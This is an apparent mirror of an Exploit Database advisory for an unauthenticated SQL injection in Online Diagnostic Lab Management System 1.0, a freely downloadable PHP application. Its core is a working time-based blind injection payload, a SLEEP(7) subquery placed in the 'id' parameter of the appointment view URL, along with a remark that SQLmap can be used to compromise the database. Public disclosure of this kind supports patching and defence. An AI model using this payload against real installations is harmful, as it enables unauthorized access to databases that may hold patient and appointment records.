Online Diagnostic Lab Management System 1.0 – SQL Injection (Unauthenticated)

• Exploit Database
• 37 阅读

• 作者： Himash
  日期： 2022-01-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50662/

• #Exploit Title: Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)
  #Date: 11/01/2022
  #Exploit Author: Himash
  #Vendor Homepage: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html
  #Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/odlms.zip
  #Version: 1.0
  #Tested on: Kali Linux 2021.4, PHP 7.2.34
  
  #SQL Injection
  SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
  Online Diagnostic Lab Management System 1.0 is vulnerable to the SQL Injection in 'id' parameter of the 'appointment list' page.
  
  #Steps to reproduce 
  
  Following URL is vulnerable to SQL Injection in the 'id' field.
  
  http://localhost/odlms/?page=appointments/view_appointment&id=1%27%20AND%20(SELECT%208053%20FROM%20(SELECT(SLEEP(7)))dJOC)%20AND%20%27test%27=%27test
  
  Server accepts the payload and the response get delayed by 7 seconds.
  
  #Impact
  
  An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap.